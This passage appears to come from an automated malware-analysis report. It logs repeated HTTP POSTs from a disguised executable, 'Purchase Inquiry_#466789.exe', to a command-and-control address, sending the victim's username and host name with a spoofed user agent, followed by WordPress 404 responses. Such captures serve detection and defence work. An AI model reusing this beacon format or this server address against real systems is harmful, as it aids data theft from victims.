                  May 27, 2024 08:33:21.748644114 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                  Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                  May 27, 2024 08:33:21.748728991 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                  Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                  May 27, 2024 08:33:21.748783112 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:33:21.748833895 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:33:21.748869896 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:33:21.748889923 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                  May 27, 2024 08:33:21.748909950 CEST224INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                  Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  30192.168.2.44977445.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:33:21.908513069 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:33:21.913496017 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:33:23.993746996 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:33:22 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:33:23.993802071 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                  May 27, 2024 08:33:23.993813992 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                  Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                  May 27, 2024 08:33:23.993820906 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                  Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                  May 27, 2024 08:33:23.993827105 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                  Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                  May 27, 2024 08:33:23.993851900 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                  Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                  May 27, 2024 08:33:23.993868113 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:33:23.993936062 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:33:23.993947983 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:33:23.994159937 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                  Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  31192.168.2.44977545.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:33:24.224994898 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:33:24.229907036 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:33:26.421930075 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:33:24 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:33:26.421999931 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                  Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                  May 27, 2024 08:33:26.422049046 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                  Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                  May 27, 2024 08:33:26.422080040 CEST672INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                  Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                  May 27, 2024 08:33:26.422142029 CEST1236INData Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d
                  Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
                  May 27, 2024 08:33:26.422187090 CEST224INData Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a
                  Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
                  May 27, 2024 08:33:26.422233105 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                  Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                  May 27, 2024 08:33:26.422286987 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                  Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                  May 27, 2024 08:33:26.422333956 CEST1236INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                  Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                  May 27, 2024 08:33:26.422384024 CEST1236INData Raw: 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b
                  Data Ascii: ar(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  32192.168.2.44977645.61.137.215807244C:\Users\user\Desktop\Purchase Inquiry_#466789.exe
                  TimestampBytes transferredDirectionData
                  May 27, 2024 08:33:28.312062979 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.137.215
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: A316C5D8
                  Content-Length: 149
                  Connection: close
                  May 27, 2024 08:33:28.317111969 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 37 00 35 00 30 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones675052JONES-PC0FDD42EE188E931437F4FBE2C
                  May 27, 2024 08:33:30.431902885 CEST1236INHTTP/1.0 404 Not Found
                  Date: Mon, 27 May 2024 06:33:28 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                  May 27, 2024 08:33:30.431971073 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
